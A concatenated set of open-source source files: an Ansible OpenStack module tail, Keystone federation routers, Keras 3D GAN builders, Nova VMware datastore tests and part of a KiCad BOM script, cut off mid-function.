                if _needs_update(module, service):
                    service = cloud.update_service(
                        service.id, name=name, type=service_type, enabled=enabled,
                        description=description)
                    changed = True
                else:
                    changed = False
            module.exit_json(changed=changed, service=service, id=service.id)
        elif state == 'absent':
            if service is None:
                changed = False
            else:
                cloud.delete_service(service.id)
                changed = True
            module.exit_json(changed=changed)
    except sdk.exceptions.OpenStackCloudException as e:
        # Surface any SDK failure as a module failure.
        module.fail_json(msg=str(e))
if __name__ == '__main__':
main()
| gpl-3.0 |
klmitch/keystone | keystone/federation/routers.py | 3 | 10198 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
from keystone.common import json_home
from keystone.common import wsgi
from keystone.federation import controllers
# Relation builders pre-bound with the OS-FEDERATION extension name and
# version, so the JSON-Home registrations below stay terse.
build_resource_relation = functools.partial(
    json_home.build_v3_extension_resource_relation,
    extension_name='OS-FEDERATION', extension_version='1.0')
build_parameter_relation = functools.partial(
    json_home.build_v3_extension_parameter_relation,
    extension_name='OS-FEDERATION', extension_version='1.0')

# JSON-Home relations for the identity-provider, protocol, and
# service-provider path parameters used throughout the routes.
IDP_ID_PARAMETER_RELATION = build_parameter_relation(parameter_name='idp_id')

PROTOCOL_ID_PARAMETER_RELATION = build_parameter_relation(
    parameter_name='protocol_id')

SP_ID_PARAMETER_RELATION = build_parameter_relation(parameter_name='sp_id')
class Routers(wsgi.RoutersBase):
    """API Endpoints for the Federation extension.

    The API looks like::

        PUT /OS-FEDERATION/identity_providers/{idp_id}
        GET /OS-FEDERATION/identity_providers
        GET /OS-FEDERATION/identity_providers/{idp_id}
        DELETE /OS-FEDERATION/identity_providers/{idp_id}
        PATCH /OS-FEDERATION/identity_providers/{idp_id}

        PUT /OS-FEDERATION/identity_providers/
            {idp_id}/protocols/{protocol_id}
        GET /OS-FEDERATION/identity_providers/
            {idp_id}/protocols
        GET /OS-FEDERATION/identity_providers/
            {idp_id}/protocols/{protocol_id}
        PATCH /OS-FEDERATION/identity_providers/
            {idp_id}/protocols/{protocol_id}
        DELETE /OS-FEDERATION/identity_providers/
            {idp_id}/protocols/{protocol_id}

        PUT /OS-FEDERATION/mappings
        GET /OS-FEDERATION/mappings
        PATCH /OS-FEDERATION/mappings/{mapping_id}
        GET /OS-FEDERATION/mappings/{mapping_id}
        DELETE /OS-FEDERATION/mappings/{mapping_id}

        GET /OS-FEDERATION/projects
        GET /OS-FEDERATION/domains

        PUT /OS-FEDERATION/service_providers/{sp_id}
        GET /OS-FEDERATION/service_providers
        GET /OS-FEDERATION/service_providers/{sp_id}
        DELETE /OS-FEDERATION/service_providers/{sp_id}
        PATCH /OS-FEDERATION/service_providers/{sp_id}

        GET /OS-FEDERATION/identity_providers/{idp_id}/
            protocols/{protocol_id}/auth
        POST /OS-FEDERATION/identity_providers/{idp_id}/
            protocols/{protocol_id}/auth
        GET /auth/OS-FEDERATION/identity_providers/
            {idp_id}/protocols/{protocol_id}/websso
            ?origin=https%3A//horizon.example.com
        POST /auth/OS-FEDERATION/identity_providers/
            {idp_id}/protocols/{protocol_id}/websso
            ?origin=https%3A//horizon.example.com

        POST /auth/OS-FEDERATION/saml2
        POST /auth/OS-FEDERATION/saml2/ecp
        GET /OS-FEDERATION/saml2/metadata
        GET /auth/OS-FEDERATION/websso/{protocol_id}
            ?origin=https%3A//horizon.example.com
        POST /auth/OS-FEDERATION/websso/{protocol_id}
            ?origin=https%3A//horizon.example.com
    """
    def _construct_url(self, suffix):
        # Every extension-local resource lives under the /OS-FEDERATION
        # prefix; auth routes additionally prepend '/auth' at the call site.
        return "/OS-FEDERATION/%s" % suffix
    def append_v3_routers(self, mapper, routers):
        """Register all OS-FEDERATION routes (see class docstring) on mapper.

        Each _add_resource call binds one URL path to controller actions and
        publishes the corresponding JSON-Home relation/parameter metadata.
        """
        auth_controller = controllers.Auth()
        idp_controller = controllers.IdentityProvider()
        protocol_controller = controllers.FederationProtocol()
        mapping_controller = controllers.MappingController()
        project_controller = controllers.ProjectAssignmentV3()
        domain_controller = controllers.DomainV3()
        saml_metadata_controller = controllers.SAMLMetadataV3()
        sp_controller = controllers.ServiceProvider()
        # Identity Provider CRUD operations
        self._add_resource(
            mapper, idp_controller,
            path=self._construct_url('identity_providers/{idp_id}'),
            get_action='get_identity_provider',
            put_action='create_identity_provider',
            patch_action='update_identity_provider',
            delete_action='delete_identity_provider',
            rel=build_resource_relation(resource_name='identity_provider'),
            path_vars={
                'idp_id': IDP_ID_PARAMETER_RELATION,
            })
        self._add_resource(
            mapper, idp_controller,
            path=self._construct_url('identity_providers'),
            get_action='list_identity_providers',
            rel=build_resource_relation(resource_name='identity_providers'))
        # Protocol CRUD operations
        self._add_resource(
            mapper, protocol_controller,
            path=self._construct_url('identity_providers/{idp_id}/protocols/'
                                     '{protocol_id}'),
            get_action='get_protocol',
            put_action='create_protocol',
            patch_action='update_protocol',
            delete_action='delete_protocol',
            rel=build_resource_relation(
                resource_name='identity_provider_protocol'),
            path_vars={
                'idp_id': IDP_ID_PARAMETER_RELATION,
                'protocol_id': PROTOCOL_ID_PARAMETER_RELATION,
            })
        self._add_resource(
            mapper, protocol_controller,
            path=self._construct_url('identity_providers/{idp_id}/protocols'),
            get_action='list_protocols',
            rel=build_resource_relation(
                resource_name='identity_provider_protocols'),
            path_vars={
                'idp_id': IDP_ID_PARAMETER_RELATION,
            })
        # Mapping CRUD operations
        self._add_resource(
            mapper, mapping_controller,
            path=self._construct_url('mappings/{mapping_id}'),
            get_action='get_mapping',
            put_action='create_mapping',
            patch_action='update_mapping',
            delete_action='delete_mapping',
            rel=build_resource_relation(resource_name='mapping'),
            path_vars={
                'mapping_id': build_parameter_relation(
                    parameter_name='mapping_id'),
            })
        self._add_resource(
            mapper, mapping_controller,
            path=self._construct_url('mappings'),
            get_action='list_mappings',
            rel=build_resource_relation(resource_name='mappings'))
        # Service Providers CRUD operations
        self._add_resource(
            mapper, sp_controller,
            path=self._construct_url('service_providers/{sp_id}'),
            get_action='get_service_provider',
            put_action='create_service_provider',
            patch_action='update_service_provider',
            delete_action='delete_service_provider',
            rel=build_resource_relation(resource_name='service_provider'),
            path_vars={
                'sp_id': SP_ID_PARAMETER_RELATION,
            })
        self._add_resource(
            mapper, sp_controller,
            path=self._construct_url('service_providers'),
            get_action='list_service_providers',
            rel=build_resource_relation(resource_name='service_providers'))
        # Project/domain listings for the authenticated (federated) user;
        # each is also exposed under the newer /auth/... path.
        self._add_resource(
            mapper, domain_controller,
            path=self._construct_url('domains'),
            new_path='/auth/domains',
            get_action='list_domains_for_groups',
            rel=build_resource_relation(resource_name='domains'))
        self._add_resource(
            mapper, project_controller,
            path=self._construct_url('projects'),
            new_path='/auth/projects',
            get_action='list_projects_for_groups',
            rel=build_resource_relation(resource_name='projects'))
        # Auth operations
        self._add_resource(
            mapper, auth_controller,
            path=self._construct_url('identity_providers/{idp_id}/'
                                     'protocols/{protocol_id}/auth'),
            get_post_action='federated_authentication',
            rel=build_resource_relation(
                resource_name='identity_provider_protocol_auth'),
            path_vars={
                'idp_id': IDP_ID_PARAMETER_RELATION,
                'protocol_id': PROTOCOL_ID_PARAMETER_RELATION,
            })
        self._add_resource(
            mapper, auth_controller,
            path='/auth' + self._construct_url('saml2'),
            post_action='create_saml_assertion',
            rel=build_resource_relation(resource_name='saml2'))
        self._add_resource(
            mapper, auth_controller,
            path='/auth' + self._construct_url('saml2/ecp'),
            post_action='create_ecp_assertion',
            rel=build_resource_relation(resource_name='ecp'))
        self._add_resource(
            mapper, auth_controller,
            path='/auth' + self._construct_url('websso/{protocol_id}'),
            get_post_action='federated_sso_auth',
            rel=build_resource_relation(resource_name='websso'),
            path_vars={
                'protocol_id': PROTOCOL_ID_PARAMETER_RELATION,
            })
        # NOTE(review): this route reuses the 'identity_providers' relation,
        # which looks copy-pasted from the list route above -- confirm the
        # intended JSON-Home relation for IdP-specific WebSSO.
        self._add_resource(
            mapper, auth_controller,
            path='/auth' + self._construct_url(
                'identity_providers/{idp_id}/protocols/{protocol_id}/websso'),
            get_post_action='federated_idp_specific_sso_auth',
            rel=build_resource_relation(resource_name='identity_providers'),
            path_vars={
                'idp_id': IDP_ID_PARAMETER_RELATION,
                'protocol_id': PROTOCOL_ID_PARAMETER_RELATION,
            })
        # Keystone-Identity-Provider metadata endpoint
        self._add_resource(
            mapper, saml_metadata_controller,
            path=self._construct_url('saml2/metadata'),
            get_action='get_metadata',
            rel=build_resource_relation(resource_name='metadata'))
| apache-2.0 |
shrucis1/em-data-gan | em_gan_models.py | 1 | 6116 | from keras.layers import Conv3D, Conv3DTranspose, UpSampling3D, Dense, Reshape, Flatten, Activation, Input
from keras.models import Sequential
from keras.layers.advanced_activations import LeakyReLU
from keras_adversarial.legacy import l1l2
def em_generator(latent_dim, input_shape, leaky_alpha=None, reg=lambda: l1l2(1e-7, 1e-7)):
    """Build the small 3D EM-volume generator.

    Args:
        latent_dim: length of the latent noise vector fed to the model.
        input_shape: unused; kept so every builder in this module shares
            the same signature.
        leaky_alpha: optional list of 6 LeakyReLU slopes (one per
            activation); defaults to 0.2 everywhere.
        reg: zero-argument factory returning a fresh kernel regularizer.

    Returns:
        A keras Sequential model mapping (latent_dim,) noise to a
        single-channel 3D volume with a sigmoid output.
    """
    # Build the default slope list per call; the original signature used a
    # mutable default ('6*[0.2]') that would be shared across calls.
    if leaky_alpha is None:
        leaky_alpha = [0.2] * 6
    model = Sequential()
    # 1728 = 6*6*3*16: the dense activations are reshaped into a coarse volume.
    model.add(Dense(1728, input_shape=(latent_dim,), kernel_regularizer=reg()))
    model.add(LeakyReLU(leaky_alpha[0]))
    model.add(Reshape([6, 6, 3, 16]))
    model.add(UpSampling3D((2, 2, 2)))
    model.add(Conv3DTranspose(64, (5, 5, 3), kernel_regularizer=reg()))
    model.add(LeakyReLU(leaky_alpha[1]))
    model.add(Conv3DTranspose(32, (5, 5, 3), kernel_regularizer=reg()))
    model.add(LeakyReLU(leaky_alpha[2]))
    model.add(Conv3DTranspose(16, (5, 5, 3), kernel_regularizer=reg()))
    model.add(LeakyReLU(leaky_alpha[3]))
    model.add(Conv3DTranspose(16, (3, 3, 3), kernel_regularizer=reg()))
    model.add(LeakyReLU(leaky_alpha[4]))
    model.add(Conv3D(8, (3, 3, 3), kernel_regularizer=reg()))
    model.add(LeakyReLU(leaky_alpha[5]))
    model.add(Conv3D(1, (1, 1, 1), activation="sigmoid", kernel_regularizer=reg()))
    return model
def em_discriminator(input_shape, leaky_alpha=None, reg=lambda: l1l2(1e-7, 1e-7)):
    """Build the small 3D EM discriminator.

    Args:
        input_shape: spatial shape of the input volume (a single channel
            axis is appended internally).
        leaky_alpha: optional list of 5 LeakyReLU slopes; defaults to 0.2
            for each activation.
        reg: zero-argument factory returning a fresh kernel regularizer.

    Returns:
        A keras Sequential model producing a sigmoid real/fake score.
    """
    # Avoid the shared mutable default ('5*[0.2]') of the original signature.
    if leaky_alpha is None:
        leaky_alpha = [0.2] * 5
    disc = Sequential()
    disc.add(Conv3D(128, (5, 5, 3), input_shape=(input_shape + (1,)), kernel_regularizer=reg()))
    disc.add(LeakyReLU(leaky_alpha[0]))
    disc.add(Conv3D(64, (3, 3, 3), kernel_regularizer=reg()))
    disc.add(LeakyReLU(leaky_alpha[1]))
    disc.add(Conv3D(32, (3, 3, 3), kernel_regularizer=reg()))
    disc.add(LeakyReLU(leaky_alpha[2]))
    disc.add(Conv3D(8, (1, 1, 1), kernel_regularizer=reg()))
    disc.add(LeakyReLU(leaky_alpha[3]))
    disc.add(Flatten())
    disc.add(Dense(8, kernel_regularizer=reg()))
    disc.add(LeakyReLU(leaky_alpha[4]))
    disc.add(Dense(1))
    disc.add(Activation("sigmoid"))
    return disc
def em_generator_large(latent_dim, input_shape, leaky_alpha=None, reg=lambda: l1l2(1e-7, 1e-7)):
    """Build the large 3D EM-volume generator.

    Args:
        latent_dim: length of the latent noise vector.
        input_shape: unused; kept for signature parity with the other
            builders in this module.
        leaky_alpha: optional list of 7 LeakyReLU slopes; defaults to 0.2
            for each activation.
        reg: zero-argument factory returning a fresh kernel regularizer.

    Returns:
        A keras Sequential model mapping noise to a single-channel 3D
        volume with a sigmoid output.
    """
    # Per-call default replaces the shared mutable default ('7*[0.2]').
    if leaky_alpha is None:
        leaky_alpha = [0.2] * 7
    model = Sequential()
    # 3072 = 8*8*3*16: reshape dense activations into a coarse volume.
    model.add(Dense(3072, input_shape=(latent_dim,), kernel_regularizer=reg()))
    model.add(LeakyReLU(leaky_alpha[0]))
    model.add(Reshape([8, 8, 3, 16]))
    model.add(UpSampling3D((6, 6, 2)))
    model.add(Conv3DTranspose(64, (7, 7, 3), kernel_regularizer=reg()))
    model.add(LeakyReLU(leaky_alpha[1]))
    model.add(Conv3DTranspose(32, (7, 7, 3), kernel_regularizer=reg()))
    model.add(LeakyReLU(leaky_alpha[2]))
    model.add(Conv3DTranspose(16, (5, 5, 3), kernel_regularizer=reg()))
    model.add(LeakyReLU(leaky_alpha[3]))
    model.add(Conv3DTranspose(16, (5, 5, 3), kernel_regularizer=reg()))
    model.add(LeakyReLU(leaky_alpha[4]))
    model.add(Conv3D(8, (3, 3, 5), kernel_regularizer=reg()))
    model.add(LeakyReLU(leaky_alpha[5]))
    model.add(Conv3D(8, (3, 3, 4), kernel_regularizer=reg()))
    model.add(LeakyReLU(leaky_alpha[6]))
    model.add(Conv3D(1, (1, 1, 1), activation="sigmoid", kernel_regularizer=reg()))
    return model
def em_discriminator_large(input_shape, leaky_alpha=None, reg=lambda: l1l2(1e-7, 1e-7)):
    """Build the large 3D EM discriminator.

    Args:
        input_shape: spatial shape of the input volume (a single channel
            axis is appended internally).
        leaky_alpha: optional list of 7 LeakyReLU slopes; defaults to 0.2
            for each activation.
        reg: zero-argument factory returning a fresh kernel regularizer.

    Returns:
        A keras Sequential model producing a sigmoid real/fake score.
    """
    # Per-call default replaces the shared mutable default ('7*[0.2]').
    if leaky_alpha is None:
        leaky_alpha = [0.2] * 7
    disc = Sequential()
    # The depth axis is upsampled 2x before the convolution stack.
    disc.add(UpSampling3D((1, 1, 2), input_shape=(input_shape + (1,))))
    disc.add(Conv3D(128, (7, 7, 3), kernel_regularizer=reg()))
    disc.add(LeakyReLU(leaky_alpha[0]))
    disc.add(Conv3D(64, (5, 5, 3), kernel_regularizer=reg()))
    disc.add(LeakyReLU(leaky_alpha[1]))
    disc.add(Conv3D(64, (5, 5, 3), kernel_regularizer=reg()))
    disc.add(LeakyReLU(leaky_alpha[2]))
    disc.add(Conv3D(64, (3, 3, 3), kernel_regularizer=reg()))
    disc.add(LeakyReLU(leaky_alpha[3]))
    disc.add(Conv3D(32, (3, 3, 1), kernel_regularizer=reg()))
    disc.add(LeakyReLU(leaky_alpha[4]))
    disc.add(Conv3D(16, (1, 1, 1), kernel_regularizer=reg()))
    disc.add(LeakyReLU(leaky_alpha[5]))
    disc.add(Flatten())
    disc.add(Dense(16, kernel_regularizer=reg()))
    disc.add(LeakyReLU(leaky_alpha[6]))
    disc.add(Dense(1))
    disc.add(Activation("sigmoid"))
    return disc
def em_generator_large_boundaries(latent_dim, input_shape, leaky_alpha=None, reg=lambda: l1l2(1e-7, 1e-7)):
    """Build the large generator using the functional API (boundaries variant).

    Same layer stack as em_generator_large, expressed with the functional
    API so that additional boundary outputs can be attached later.

    Args:
        latent_dim: length of the latent noise vector.
        input_shape: unused; kept for signature parity with the other
            builders in this module.
        leaky_alpha: optional list of 7 LeakyReLU slopes; defaults to 0.2.
        reg: zero-argument factory returning a fresh kernel regularizer.

    Returns:
        A keras Model mapping noise to a single-channel sigmoid volume.
    """
    # Local import: the module top only imports Sequential from keras.models.
    from keras.models import Model
    # Per-call default replaces the shared mutable default ('7*[0.2]').
    if leaky_alpha is None:
        leaky_alpha = [0.2] * 7
    input_layer = Input(shape=(latent_dim,))
    l = Dense(3072, kernel_regularizer=reg())(input_layer)
    l = LeakyReLU(leaky_alpha[0])(l)
    l = Reshape([8, 8, 3, 16])(l)
    l = UpSampling3D((6, 6, 2))(l)
    l = Conv3DTranspose(64, (7, 7, 3), kernel_regularizer=reg())(l)
    l = LeakyReLU(leaky_alpha[1])(l)
    l = Conv3DTranspose(32, (7, 7, 3), kernel_regularizer=reg())(l)
    l = LeakyReLU(leaky_alpha[2])(l)
    l = Conv3DTranspose(16, (5, 5, 3), kernel_regularizer=reg())(l)
    l = LeakyReLU(leaky_alpha[3])(l)
    l = Conv3DTranspose(16, (5, 5, 3), kernel_regularizer=reg())(l)
    l = LeakyReLU(leaky_alpha[4])(l)
    l = Conv3D(8, (3, 3, 5), kernel_regularizer=reg())(l)
    l = LeakyReLU(leaky_alpha[5])(l)
    l = Conv3D(8, (3, 3, 4), kernel_regularizer=reg())(l)
    l = LeakyReLU(leaky_alpha[6])(l)
    # TODO: attach boundary-prediction outputs alongside the volume output.
    output = Conv3D(1, (1, 1, 1), activation="sigmoid", kernel_regularizer=reg())(l)
    # BUG FIX: the original fell through to 'model.add(...)' / 'return model'
    # with 'model' never defined (NameError at call time). Wrap the
    # functional graph in a Model instead.
    return Model(inputs=input_layer, outputs=output)
# TODO: extend this discriminator to also consume boundary maps.
def em_discriminator_large_boundaries(input_shape, leaky_alpha=None, reg=lambda: l1l2(1e-7, 1e-7)):
    """Build the large discriminator (boundaries variant).

    Currently identical to em_discriminator_large; kept separate as the
    attachment point for future boundary inputs (see TODO above).

    Args:
        input_shape: spatial shape of the input volume (a single channel
            axis is appended internally).
        leaky_alpha: optional list of 7 LeakyReLU slopes; defaults to 0.2.
        reg: zero-argument factory returning a fresh kernel regularizer.

    Returns:
        A keras Sequential model producing a sigmoid real/fake score.
    """
    # Per-call default replaces the shared mutable default ('7*[0.2]').
    if leaky_alpha is None:
        leaky_alpha = [0.2] * 7
    disc = Sequential()
    disc.add(UpSampling3D((1, 1, 2), input_shape=(input_shape + (1,))))
    disc.add(Conv3D(128, (7, 7, 3), kernel_regularizer=reg()))
    disc.add(LeakyReLU(leaky_alpha[0]))
    disc.add(Conv3D(64, (5, 5, 3), kernel_regularizer=reg()))
    disc.add(LeakyReLU(leaky_alpha[1]))
    disc.add(Conv3D(64, (5, 5, 3), kernel_regularizer=reg()))
    disc.add(LeakyReLU(leaky_alpha[2]))
    disc.add(Conv3D(64, (3, 3, 3), kernel_regularizer=reg()))
    disc.add(LeakyReLU(leaky_alpha[3]))
    disc.add(Conv3D(32, (3, 3, 1), kernel_regularizer=reg()))
    disc.add(LeakyReLU(leaky_alpha[4]))
    disc.add(Conv3D(16, (1, 1, 1), kernel_regularizer=reg()))
    disc.add(LeakyReLU(leaky_alpha[5]))
    disc.add(Flatten())
    disc.add(Dense(16, kernel_regularizer=reg()))
    disc.add(LeakyReLU(leaky_alpha[6]))
    disc.add(Dense(1))
    disc.add(Activation("sigmoid"))
    return disc
| gpl-2.0 |
petrutlucian94/nova_dev | nova/tests/virt/vmwareapi/test_vm_util_datastore_selection.py | 3 | 5170 | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import re
from nova import test
from nova.virt.vmwareapi import vm_util
# Lightweight stand-ins for the vSphere API result objects consumed by
# vm_util._get_datastore_ref_and_name() in the tests below.
ResultSet = collections.namedtuple('ResultSet', ['objects'])
# NOTE(review): the typename here repeats 'ResultSet' (not 'ResultSetToken');
# presumably intentional to mimic the API's repr -- confirm before changing.
ResultSetToken = collections.namedtuple('ResultSet', ['objects', 'token'])
ObjectContent = collections.namedtuple('ObjectContent', ['obj', 'propSet'])
DynamicProperty = collections.namedtuple('Property', ['name', 'val'])
MoRef = collections.namedtuple('ManagedObjectReference', ['value'])
class VMwareVMUtilDatastoreSelectionTestCase(test.NoDBTestCase):
    """Tests for vm_util._get_datastore_ref_and_name() filtering logic."""

    def setUp(self):
        super(VMwareVMUtilDatastoreSelectionTestCase, self).setUp()
        # Each row mirrors self.propset_name_list:
        # [summary.type, summary.name, summary.accessible,
        #  summary.capacity, summary.freeSpace]
        self.data = [
            ['VMFS', 'os-some-name', True, 987654321, 12346789],
            ['NFS', 'another-name', True, 9876543210, 123467890],
            ['BAD', 'some-name-bad', True, 98765432100, 1234678900],
            ['VMFS', 'some-name-good', False, 987654321, 12346789],
        ]

    def build_result_set(self, mock_data, name_list=None):
        """Build a fake vSphere ResultSet from rows of property values.

        Datastores are given moref ids of ds-000, ds-001, and so on,
        based on their index in the mock_data list.
        """
        if name_list is None:
            name_list = self.propset_name_list
        objects = []
        # 'idx' rather than 'id' so the builtin is not shadowed; zip()
        # pairs each property name with its value directly instead of
        # re-indexing the row by position as the original did.
        for idx, row in enumerate(mock_data):
            prop_set = [DynamicProperty(name=name, val=value)
                        for name, value in zip(name_list, row)]
            objects.append(ObjectContent(
                obj=MoRef(value="ds-%03d" % idx),
                propSet=prop_set))
        return ResultSet(objects=objects)

    @property
    def propset_name_list(self):
        """Property names matching the columns of each mock data row."""
        return ['summary.type', 'summary.name', 'summary.accessible',
                'summary.capacity', 'summary.freeSpace']

    def test_filter_datastores_simple(self):
        # The accessible NFS datastore (ds-001) should be chosen; rec is
        # (moref, name, capacity, freespace).
        datastores = self.build_result_set(self.data)
        rec = vm_util._get_datastore_ref_and_name(datastores)
        self.assertIsNotNone(rec[0], "could not find datastore!")
        self.assertEqual('ds-001', rec[0].value,
                         "didn't find the right datastore!")
        self.assertEqual(123467890, rec[3],
                         "did not obtain correct freespace!")

    def test_filter_datastores_empty(self):
        # No datastores at all -> no selection.
        data = []
        datastores = self.build_result_set(data)
        rec = vm_util._get_datastore_ref_and_name(datastores)
        self.assertIsNone(rec)

    def test_filter_datastores_no_match(self):
        # A regex that matches no datastore name -> no selection.
        datastores = self.build_result_set(self.data)
        datastore_regex = re.compile('no_match.*')
        rec = vm_util._get_datastore_ref_and_name(datastores,
                                                  datastore_regex)
        self.assertIsNone(rec, "did not fail to match datastore properly")

    def test_filter_datastores_specific_match(self):
        data = [
            ['VMFS', 'os-some-name', True, 987654321, 1234678],
            ['NFS', 'another-name', True, 9876543210, 123467890],
            ['BAD', 'some-name-bad', True, 98765432100, 1234678900],
            ['VMFS', 'some-name-good', True, 987654321, 12346789],
            ['VMFS', 'some-other-good', False, 987654321000, 12346789000],
        ]
        # only the DS some-name-good is accessible and matches the regex
        datastores = self.build_result_set(data)
        datastore_regex = re.compile('.*-good$')
        rec = vm_util._get_datastore_ref_and_name(datastores,
                                                  datastore_regex)
        self.assertIsNotNone(rec, "could not find datastore!")
        self.assertEqual('ds-003', rec[0].value,
                         "didn't find the right datastore!")
        self.assertNotEqual('ds-004', rec[0].value,
                            "accepted an unreachable datastore!")
        self.assertEqual('some-name-good', rec[1])
        self.assertEqual(12346789, rec[3],
                         "did not obtain correct freespace!")
        self.assertEqual(987654321, rec[2],
                         "did not obtain correct capacity!")

    def test_filter_datastores_missing_props(self):
        data = [
            ['VMFS', 'os-some-name', 987654321, 1234678],
            ['NFS', 'another-name', 9876543210, 123467890],
        ]
        # no matches are expected when 'summary.accessible' is missing
        prop_names = ['summary.type', 'summary.name',
                      'summary.capacity', 'summary.freeSpace']
        datastores = self.build_result_set(data, prop_names)
        rec = vm_util._get_datastore_ref_and_name(datastores)
        self.assertIsNone(rec, "no matches were expected")
| apache-2.0 |
peterpolidoro/kicad_bom | kicad_bom/kicad_bom.py | 2 | 8824 | #
# Python script to generate BOM in multiple formats from a KiCad generic netlist.
#
import kicad_netlist_reader
import os
import csv
class KicadBom:
    """Generate BOM and per-vendor order CSV files from a KiCad XML netlist.

    On construction the netlist is located (searching recursively when
    given a directory or nothing), parsed, and an output directory named
    'bom' is created next to it.
    """

    def __init__(self, netlist_path=None):
        self._netlist_ext = '.xml'
        self._netlist_path = None
        self._netlist = None
        self._grouped_components = None
        self._column_names = None
        # Sentinel string used to bucket components without a part number;
        # compared by identity ('is') throughout so a netlist field that
        # happens to equal the string is still treated as a real number.
        self._no_part_number = 'NO_PART_NUMBER'
        self._update_netlist(netlist_path)
        if self._netlist_path is None:
            # NOTE(review): _read_netlist raises RuntimeError when no netlist
            # is found, so this guard looks unreachable -- kept as a
            # defensive no-op to avoid changing behavior.
            return
        self._output_dir = os.path.join(os.path.dirname(self._netlist_path), 'bom')
        if not os.path.exists(self._output_dir):
            os.makedirs(self._output_dir)

    def _update_netlist(self, netlist_path=None):
        """(Re)read the netlist on first use or when an explicit path is given."""
        if (self._netlist_path is None) or (netlist_path is not None):
            self._read_netlist(netlist_path)

    def _find_netlist_path(self, netlist_path=None):
        """Resolve netlist_path to an actual netlist file path.

        Accepts a file path (must have the netlist extension), a directory
        to search recursively, or None (search the current working
        directory). Returns None when nothing suitable is found.
        """
        search_path = None
        if (netlist_path is None) or (not os.path.exists(netlist_path)):
            search_path = os.getcwd()
        elif os.path.isdir(netlist_path):
            search_path = netlist_path
        else:
            (root, ext) = os.path.splitext(netlist_path)
            if ext == self._netlist_ext:
                return netlist_path
            else:
                return None
        for root, dirs, files in os.walk(search_path):
            for f in files:
                if f.endswith(self._netlist_ext):
                    return os.path.join(root, f)
        return None

    def _read_netlist(self, netlist_path=None):
        """Parse the netlist, derive the BOM columns, and group components.

        Raises:
            RuntimeError: if no netlist file can be located.
        """
        self._netlist_path = self._find_netlist_path(netlist_path)
        if self._netlist_path is None:
            raise RuntimeError('Cannot find netlist!')
        # Generate an instance of a generic netlist and load the netlist tree.
        self._netlist = kicad_netlist_reader.netlist(self._netlist_path)
        # Subset the components to those wanted in the BOM, controlled
        # by the <configure> block in kicad_netlist_reader.py.
        components = self._netlist.getInterestingComponents()
        compfields = self._netlist.gatherComponentFieldUnion(components)
        partfields = self._netlist.gatherLibPartFieldUnion()
        partfields -= set(['Reference', 'Value', 'Datasheet', 'Footprint'])
        additional_columns = compfields | partfields  # union
        self._column_names = ['Item', 'Reference(s)', 'Quantity']
        self._base_column_length = len(self._column_names)
        # Append the optional columns that actually occur in this netlist,
        # in a fixed, predictable order (replaces six copy-pasted if blocks).
        for optional in ('Manufacturer', 'Manufacturer Part Number',
                         'Vendor', 'Vendor Part Number',
                         'Description', 'Package'):
            if optional in additional_columns:
                self._column_names.append(optional)
        # Get all of the components in groups of matching parts + values
        # (see kicad_netlist_reader.py).
        self._grouped_components = self._netlist.groupComponents(components)

    def _get_bom_row_from_part(self, item, part_number, part_info):
        """Format one BOM row; rows without a part number get a blank Item."""
        ref_string = self._refs_to_string(part_info['refs'])
        quantity = part_info['quantity']
        group = part_info['group']
        row = []
        # Identity check against the sentinel (see __init__).
        if part_number is not self._no_part_number:
            row.append(item)
        else:
            row.append('')
        row.append(ref_string)
        row.append(quantity)
        for field in self._column_names[self._base_column_length:]:
            value = self._netlist.getGroupField(group, field)
            row.append(value)
        return row

    def _get_parts_by_manufacturer_part_number(self):
        """Merge component groups by manufacturer part number.

        Returns:
            dict mapping part number (or the no-part-number sentinel) to
            {'refs': [...], 'quantity': int, 'group': <last group seen>}.
        """
        parts = {}
        for group in self._grouped_components:
            try:
                part_number = self._netlist.getGroupField(group, 'Manufacturer Part Number')
                if not part_number:
                    part_number = self._no_part_number
            except ValueError:
                part_number = self._no_part_number
            refs = []
            for component in group:
                refs.append(component.getRef())
            quantity = self._get_quantity_from_group(group)
            if part_number in parts:
                parts[part_number]['refs'].extend(refs)
                parts[part_number]['quantity'] += quantity
            else:
                parts[part_number] = {'refs': refs, 'quantity': quantity, 'group': group}
        return parts

    def _refs_to_string(self, refs):
        """Join component references into one space-separated string."""
        # str.join replaces the original manual concatenation loop.
        return ' '.join(refs)

    def _get_quantity_from_group(self, group):
        """Component count times the group's 'Quantity' field (default 1)."""
        count = len(group)
        try:
            quantity = int(self._netlist.getGroupField(group, 'Quantity'))
        except ValueError:
            quantity = 1
        quantity *= count
        return quantity

    def _get_parts_by_vendor(self):
        """Return {vendor: {vendor_part_number: {'quantity': n}}}."""
        # Collect the set of distinct vendors appearing in the netlist.
        vendor_set = set()
        for group in self._grouped_components:
            try:
                vendor = self._netlist.getGroupField(group, 'Vendor')
                if vendor:
                    vendor_set.add(vendor)
            except ValueError:
                # Group has no 'Vendor' field -- nothing to collect. (This
                # was a bare 'except:', which also hid unrelated errors.)
                pass
        parts_by_vendor = {}
        for vendor in vendor_set:
            parts = {}
            for group in self._grouped_components:
                part_number = None
                try:
                    if vendor == self._netlist.getGroupField(group, 'Vendor'):
                        part_number = self._netlist.getGroupField(group, 'Vendor Part Number')
                except ValueError:
                    pass
                if part_number:
                    quantity = self._get_quantity_from_group(group)
                    if part_number in parts:
                        parts[part_number]['quantity'] += quantity
                    else:
                        parts[part_number] = {'quantity': quantity}
            parts_by_vendor[vendor] = parts
        return parts_by_vendor

    def _get_vendor_row_from_part(self, part_number, part_info):
        """Format one vendor-order row: [part_number, quantity]."""
        row = []
        row.append(part_number)
        row.append(part_info['quantity'])
        return row

    def get_bom(self):
        """Build the BOM as a list of rows (header first).

        Numbered parts come first; the aggregate row for components
        without a manufacturer part number (if any) is appended last.
        """
        # Create header row
        row = []
        for c in self._column_names:
            row.append(c)
        # Create bom
        bom = []
        bom.append(row)
